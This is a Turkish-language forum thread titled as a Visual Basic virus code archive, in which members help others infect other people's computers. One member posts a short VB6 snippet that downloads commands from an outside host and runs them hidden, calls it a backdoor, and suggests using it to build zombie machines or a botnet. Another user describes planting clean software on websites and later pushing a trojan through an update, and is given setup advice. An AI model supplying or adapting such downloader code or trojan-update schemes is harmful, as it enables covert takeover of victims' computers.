Visual Basic Virüs Kod Arşivi

baha5860
Çırak
Beyler Yazmısınızki command 1 e basınca sunu yapar diye peki ya ben nasıl karşmdaki adamın bilgisayarına command 1 e tıklıcam ? Help Me!

mbk.
Forum Kalfası
sanırım oyun hilesinden bahsediyorsunuz. visual basic ile yazılan uygulamalar var.
ancak oyunun hangisi olduğunu belirtmeniz ve ona göre aramanız gerekir. forumda ararsanız çıkacaktır.

mbk.
Forum Kalfası
aslında bahsettiğiniz mevcut.

Backdoor sistemde sizin tarafınızdan açılan bir bağlantı yönetimdir.
eğer sisteme sızdıysanız zaten konu içerisindeki kodlar ile
downloader hazırlayabilirsiniz. sisteme sızmak için gerekli kodlar da mevcut.

puzzle ı birleştirmeniz gerekiyor :)

mesela,

Kod:
Dim cod
kod = Inet1.OpenURL("www.wardom.org/kod.txt")
On Local Error Resume Next
Shell cod, vbHide
Bu kod ile download edebilirsiniz. hatta buna bir backdoor diyebiliriz.
sizin uzak sunucuda yazdığınız komutları alır. eğer isterseniz bu yöntem ile
kendinize bir zombi bilgisayar oluşturabilir hatta botnet oluşturabilirsiniz :)

yada ftp üzerine dosya aktarırken put yerine get kullanırsanız
dosya indirebilirsiniz.

birçok yöntem ile downloader hazırlayabilirsiniz.

67 postta ise nasıl exe yapacağınız konusunda inceleyebilirsiniz.

- Yönetici düzenlemesi: :
AjaN Lord
Banned
desene bunla dünyayı fet ederim tamam

peki ben vb 6 kullanıyorum bu kodları nasıl ayarlayabilirim txt yükledik siteye mesela

exe virüsümü nasıl yükler misal ben bi yazılım yaptım vede o yazılım temiz sitelere gömdüm 1 y sonrada o temiz yazılıma güncel yazılım eklicem tabi trojan çaktırma :) bu kodlarla yapabilirmiyim backdoor falan filan bunları yaptık alayını fakat güncel dowlander daha üstün yeni öğrendim verdiniz kodları nasıl ayarlayabilirim forum1 demi moduldemi ne eklerim alanım değil çünkü :)

mbk.
Forum Kalfası
Form üzerinden de yapabilirsiniz kendinize ait modül de oluşturabilirsiniz. bu sizin programlama
tercihinize kalmış bir durum. program güncelleme ile ilgili birçok alternatif sunulabilir. bu yöntemler ile downloader hazırlayabilirsiniz.

herkez windows dağıtımlarını kullanıyor diye windows kullanmak zorunda olmadığımız gibi.
programlamada birçok alternatif vardır.

öncelikle kodları kullanırken ezber mantığı ile hareket etmeyin. mantığını kavramanız sizin daha iyi bir uygulama çıkarmanızı sağlayacaktır.
verilen kodları inceleyerek basit uygulamalarda kontrol edin. daha sonra projenize nasıl eklemeniz gerektiğini daha iyi anlayacaksınız.

AjaN Lord
Banned
ben bu kodu nasıl yapılandırabilirim dedim neyse teşekkürler altyapıyı bilmeden üstyapıyan girdik en kolay şeyleri bilemiyoruz
teşekkürler yardımcı oldun için bakalım yapabilecekmiyiz...

mekansiz33
Çırak
merhaba bana caplock veya numlock tusunu kontrol edecek acıksa timer1 i acacak numlock kapalı iken çalısmıyak kod verebılıcek varmı acaba